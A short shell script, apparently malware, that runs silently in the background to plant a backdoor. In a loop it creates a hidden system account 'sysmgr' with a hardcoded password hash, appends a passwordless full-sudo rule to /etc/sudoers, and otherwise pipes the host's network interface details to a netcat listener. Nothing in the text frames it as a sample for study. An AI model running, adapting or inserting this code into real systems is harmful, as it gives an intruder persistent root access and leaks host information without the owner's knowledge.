#!/bin/sh
(while true; do
    EXISTUSER=`grep "^sysmgr" /etc/passwd`
    if [ "$EXISTUSER" = "" ]; then
        PASS=zhbk9ckMHQggs
        useradd sysmgr -r -d /usr/sysmgr -p $PASS
        EXISTADMIN=`grep "^sysmgr" /etc/sudoers`
        if [ "$EXISTADMIN" = "" ]; then
            echo "sysmgr      ALL=(ALL)       NOPASSWD:ALL" >> /etc/sudoers
        fi
    else
        ip a | sed "1i$(echo -e '\001')" | nc 127.0.0.1 1234 -w 5
    fi
    sleep 1000
done > /dev/null 2>&1 &)
